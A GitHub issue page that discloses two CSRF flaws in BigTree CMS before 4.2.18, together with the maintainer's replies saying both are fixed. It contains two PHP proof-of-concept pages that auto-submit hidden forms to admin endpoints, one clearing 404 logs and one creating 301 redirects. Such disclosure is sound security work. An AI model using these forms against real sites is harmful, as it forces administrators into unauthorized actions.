Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Multiple Security Issue of CSRF exists in BigTree CMS Less than 4.2.18
one with the clear parameter to the \BigTree-CMS-4.2.18\core\admin\modules\dashboard\vitals-statistics\404\clear.php poc:
<?php $s = "<form method='post' action='http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/dashboard/vitals-statistics/404/clear/'>"; $s = $s."<input type='text' value='Clear+404s' name='clear' style='display:none!important;display:block;width=0;height=0' />"; $s = $s."</form>"; $s = $s."<script>document.forms[0].submit();</script>"; echo($s); ?>
request http://www.attack.com/poc1.php, then you will clear 404 report
tow with the from-and-to parameter to the \BigTree-CMS-4.2.18\core\admin\modules\dashboard\vitals-statistics\404\create-301.php poc:
<?php $s = "<form method='post' action='http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/dashboard/vitals-statistics/404/create-301/'>"; $s = $s."<input type='text' value='111111' name='from' style='display:none!important;display:block;width=0;height=0' />"; $s = $s."<input type='text' value='222222' name='to' style='display:none!important;display:block;width=0;height=0' />"; $s = $s."</form>"; $s = $s."<script>document.forms[0].submit();</script>"; echo($s); ?>
request http://www.attack.com/poc2.php, then you will create one 301 Redirect
repair and There is no control of user rights, any user can do these operations so, you my be use verifyCSRFToken() and requireLevel(1) function.
thank you !
email:xfkxfk@secbook.com
The text was updated successfully, but these errors were encountered:
Fixed a CSRF opportunity. Thanks xfkxfk!
ce1e965
#287
Fixed another CSRF vector.
8b21324
Fixed in the two above commits, thanks!
Sorry, something went wrong.
No branches or pull requests
Multiple Security Issue of CSRF exists in BigTree CMS Less than 4.2.18
one
with the clear parameter to the \BigTree-CMS-4.2.18\core\admin\modules\dashboard\vitals-statistics\404\clear.php
poc:
request http://www.attack.com/poc1.php, then you will clear 404 report
tow
with the from-and-to parameter to the \BigTree-CMS-4.2.18\core\admin\modules\dashboard\vitals-statistics\404\create-301.php
poc:
request http://www.attack.com/poc2.php, then you will create one 301 Redirect
repair
and There is no control of user rights, any user can do these operations
so, you my be use verifyCSRFToken() and requireLevel(1) function.
thank you !
email:xfkxfk@secbook.com
The text was updated successfully, but these errors were encountered: